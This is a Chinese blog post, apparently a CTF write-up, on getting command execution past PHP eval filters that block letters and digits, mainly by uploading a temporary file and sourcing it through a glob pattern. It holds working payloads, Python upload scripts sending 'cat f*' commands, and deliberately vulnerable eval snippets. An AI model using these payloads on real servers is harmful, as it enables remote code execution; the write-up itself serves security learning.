无字母数字webshell提高

最新推荐文章于 2024-04-16 20:35:04 发布
最新推荐文章于 2024-04-16 20:35:04 发布
阅读量1.3k 收藏 3
点赞数 2
分类专栏: php 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63231007/article/details/128499278
版权

前言

元旦快乐 -- 转眼就到了2023年 新的一年继续努力

在p神博客中看到一个 通过上传临时文件进行rce,便想着写一篇文章,记录一下这个小trick。太强了

比如给你下面这么一串代码。正如文章标题 无字母数字,如果匹配到字母和数字,就会输出nonono并终止程序,执行不到eval($code); 那我们怎么执行 phpinfo(); system('cat /flag'); 等命令呢

<?php
highlight_file(__FILE__);
$code=$_GET['code'];
if(preg_match('/[a-z0-9]/is',$code)){
    die('nonono');
}
eval($code);

有下面五种方法:

  • 取反绕过
  •  或
  • 异或
  • 自增运算
  • 上传临时文件

前四个都有专门的生成脚本,而且在CTF里应该是考烂了

可以参看yu师傅:无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本

这里我们主要说一下上传临时文件的原理和利用方法

<1> 上传临时文件进行rce原理

 PHP7 前是不允许用($a)();这样的方法来执行动态函数的。但是php7 不能用assert()来执行函数,因为php7不支持assert()函数

大部分语言都不会是单纯的逻辑语言,一门全功能的语言必然需要和操作系统进行交互。操作系统里包含的最重要的两个功能就是“shell(系统命令)”和“文件系统”,很多木马与远控其实也只实现了这两个功能

PHP中允许用 反引号来执行shell。

因为反引号不属于“字母”、“数字”,所以我们可以绕过限制,执行系统命令

同时,Linux下 shell还有两个知识点:

  1. shell下可以利用 .来执行任意脚本
  2. Linux文件名支持用glob通配符代替

  .或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。

. file执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?

    这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母

利用通配符 则/tmp/phpXXXXXX就可以表示为/*/?????????/???/?????????

但是能够匹配上/???/?????????这个通配符的文件有很多,怎么让它执行我们上传在临时文件夹里的shell呢

就跟正则表达式类似,glob支持利用[0-9]来表示一个范围。

所有文件名都是小写,只有PHP生成的临时文件包含大写字母。那么就好办了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。

在ascii码表里,大写字母位于@[之间

因此,我们可以利用[@-[]来表示大写字母

当然,php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了。

我们传入的code为?><?=`. /???/????????[@-[]`;?> post内容为命令即可。

<2> 案例一

这里我们看下面这段代码:

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

这道题限制了:

  1. webshell长度不超过35位
  2. 除了不包含字母数字,还不能包含$_

现在$被过滤了,我们无法通过构造变量来动态执行函数,还有什么办法吗?

首先一种方法:

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

所以很简单了,可以通过取反、异或、或构造一个可以生成phpinfo这个字符串的PHP表达式即可

(~%8F%97%8F%96%91%99%90)();

 

另一种 就是我们的上传临时文件 

import requests

url="http://ip:port/index.php?code=?><?=`. /???/????????[@-[]`;?>"
files={'file':'cat f*'}
res = requests.post(url=url,files=files).text
print(res)

<3> 案例二

<?php
highlight_file(__FILE__);
if(isset($_GET['code']))
{
    if(strlen($_GET['code'])>25 || preg_match("/[\w$=()<>'\"]/",$_GET['code']) )
{
    die("danger!!!!!");
    }
@eval($_GET['code']);
}

脚本跑一下未过滤的字符(在下面),可以发现过滤了字母,数字,`$`,`_`,`()`等,但`和  .  还没有被过滤。由于过滤了()所以不论PHP版本是5或者7,都不能执行($a)(),所以就没有必要去判断PHP版本

因此利用post上传临时文件绕过

上传表单: 

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://ip:*****/" method="post" enctype="multipart/form-data">   
<input type="file" name="file">
<input type="submit" value="提交">
</form>
</body>
</html>

 也可以用python requests库发包,上传文件

import requests
url="http://ip:port/test.php?code=`. /???/????????[@-[]`;"
files={'file':'cat f* > a.txt'}
res = requests.post(url=url,files=files).text
print(res)

由于过滤了 = 因此我们不能 <?= 得到回显。 需要 > 外带命令执行结果

<4> 查看未被过滤的字符的脚本 

<?php
for ($ascii = 0; $ascii < 256; $ascii++) 
    if (!preg_match("/[\w$=()<>'\"]/", chr($ascii))) 
        echo (chr($ascii));
?>

 

ctfshow之web55~web57(无字母的rce)
qq_1182418846的博客
08-31 1407
声明:本章内容是引荐几位师傅的博客,然后根据自己的理解编写而成。
php 字符串异或 绕过,浅析CTF绕过字符数字构造shell
weixin_36349685的博客
03-19 1451
前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflate对webshell编码测试源码...
字母数字RCE
Shaun111的博客
11-06 1328
前言 当字母和数字都被过滤时怎样构造webshell呢?具体代码如下 <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 首先,思路就是通过非字母数字字符经过各种变换构造出任意字母,然后拼接出函数执行 异或 原理 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,再对二进制数据进行异或,再转为ASCII,最后转为字符串 用法
字母数字webshell
weixin_43940853的博客
02-29 1864
构造无数字字母的webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
字母数字webshell总结
hackzkaq的博客
05-07 2241
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2377
命令执行字母数字webshell
php字母数字构造入门
不想去派出所
11-29 747
1 前置知识 1.1 php中的正则匹配函数 最常见的preg_grep() preg_grep(string $pattern, array $array, int $flags = 0): array|false 返回给定数组array中与模式pattern 匹配的元素组成的数组 其余的正则函数可以在https://www.runoob.com/php/php-pcre.html里学习 1.2 正则匹配式 正则表达式手册:https://tool.oschina.net/uploads/apidocs
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
Web安全】无字母数字Webshell总结 在Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母和数字字符限制的Webshell构造方法。通常,服务器会通过...
字母数字webshell进阶收藏版1
08-03
【标题】:“无字母数字webshell进阶收藏版1” 【描述】:本文主要探讨了在Webshell中如何使用无字母数字的Unicode编码进行高级技巧的实现,包括原理、缩短和压榨三个部分。 【正文】: Webshell是一种用于远程...
演示DVWA靶场实验环境-使用SQL注入漏洞获取Webshell
# 1. 导言 ## 1.1 什么是DVWA(Damn Vulnerable Web Application) DVWA(Damn Vulnerable Web Application)是一个用来练习渗透测试和Web应用安全的开源项目。它包含了多种常见的Web应用漏洞,如SQL注入、XSS(跨...
字符webshell
zip471642048的博客
12-14 2269
catflag无字符webshell 本地搭了一个环境,可以看见正则那一块过滤数字和字母。 无字符webshellPHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字字符,他们的异或结果是这个字母即可。 <?php '#'^'|'; //得到字符 _ '.'^'~'; //得到字符 P '/'^'`'; //得到字符 0 '|'^'/'; //得到字符 S '{'^'/'; //得到字符 T $_=("#
构造不包含字母和数字webshell
bo1029的博客
08-20 643
php?从运行结果为!我们可以看到,输出的结果是字符"!之所以会得到这样的结果,是因为代码中对字符"A"和字符”`"进行了异或操作。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。异或操作有时也被用来交换两个变量的值。异或操作:异或操作是两个二进制数相同时,异或为0,不同为1以上面的例子来说A的ASCII值为65,对应的二进制为0100 0001。
数字字母webshell之上传临时文件RCE
snowlyzz的博客
08-11 1154
新姿势,上传临时文件rce
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
有回显代码执行-无字母数字RCE进阶PHP5
最新发布
疯狂小伟哥的博客
04-16 1068
可以执行,符合正则匹配,但无法获取flag值;
安恒双11活动题目
suddenlyTW的博客
11-12 1013
  由于是昨天的题目,今天链接已经无法点开了,所以通过其他大神的地方把题扣了过来 web1: 代码如下:   &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;35){ die("Long."); } ...
ctfshow-web入门56(再次理解无数字字母rce)
qq_44657899的博客
10-18 2023
前言 之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell提高篇 文章目录前言glob通配符. 执行文件不需要x权限题解 glob通配符 因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大写字母位于@与[之间: 那么,我们可以利用[@-[]来表示大写字母: . 执行文件不需要x权限 题解 注意传参方式为POST。
从一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1883
前两天做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的进程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
PHP伪协议
qq_45927819的博客
07-18 714
文章目录php://filterphp://inputfile://zip:// & bzip2:// & zlib:// 协议phar:// 协议data:// 协议http:// & https:// 协议 下面就来了解一下php伪协议 php提供了一些杂项输入/输出流,允许访问php的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器 php://filter 打开链接后发现只有一个click me?no 发现 ph
深入理解无字母数字Webshell:绕过与执行策略
"无字母数字Webshell总结" 在Web安全领域,无字母数字Webshell是一种特殊类型的后门,它设计用于绕过特定的过滤机制。这种Webshell的特点在于其构造方式,不包含传统的字母或数字字符,而是利用其他非字母数字字符...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值